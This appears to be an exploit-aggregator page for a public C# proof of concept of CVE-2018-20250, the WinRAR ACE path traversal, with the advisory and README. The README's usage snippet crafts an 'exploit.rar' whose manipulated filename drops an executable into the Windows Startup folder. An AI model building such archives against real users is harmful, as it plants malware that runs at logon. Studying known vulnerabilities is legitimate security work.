CVE-2018-20250 PoC — WinRar 路径遍历漏洞

Source

https://github.com/easis/CVE-2018-20250-WinRAR-ACE

Associated Vulnerability

Title:WinRar 路径遍历漏洞 (CVE-2018-20250)
Description:In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path.

Description

Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

Readme

# CVE-2018-20250-WinRAR-ACE
Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

# Resources
https://research.checkpoint.com/extracting-code-execution-from-winrar/
https://github.com/droe/acefile
https://apidoc.roe.ch/acefile/latest/

# Dependencies
InvertedTomato.Crc (you can install it with NuGet) for the checksum method. You can use any other JAMCRC implementation.

# How to use
```csharp
  AceVolume av = new AceVolume();
  AceFile f = new AceFile(
    @"D:\some_file.exe",
    @"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
  );
  av.AddFile(f);
  av.Save("exploit.rar");
```

# Bugs
Seems that it only extracts to startup folder when the .rar file is in Desktop or any folder on the same level.

File Snapshot


 [4.0K]  /data/pocs/8cea497a8987d7cee82a1813697485d52d35ca04
├── [6.6K]  AceFile.cs
├── [6.2K]  AceVolume.cs
├── [ 787]  README.md
└── [ 415]  Utils.cs

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!